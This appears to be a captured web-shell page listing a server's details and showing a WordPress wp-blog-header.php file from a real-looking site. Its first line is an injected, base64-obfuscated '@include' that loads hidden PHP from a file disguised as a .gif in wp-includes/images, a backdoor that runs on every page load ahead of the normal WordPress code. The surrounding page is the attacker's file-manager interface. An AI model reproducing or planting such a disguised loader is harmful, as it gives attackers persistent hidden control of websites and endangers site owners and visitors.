HEX
Server: Apache
System: Linux ediplesk11.capitanhostino.it 3.10.0-1160.144.1.el7.tuxcare.els5.x86_64 #1 SMP Wed May 13 12:31:54 UTC 2026 x86_64
User: arsziaxh (10058)
PHP: 7.4.33
Disabled: opcache_get_status, kill_all_lockers, popen, exec, system, passthru, proc_open, shell_exec
Upload Files
File: /var/www/vhosts/adrianalugaresi.it/httpdocs/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL2FkcmlhbmFsdWdhcmVzaS5pdC9odHRwZG9jcy93cC1pbmNsdWRlcy9pbWFnZXMvdy1hY2JjZWZmZmRhZmRiZC5naWY=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}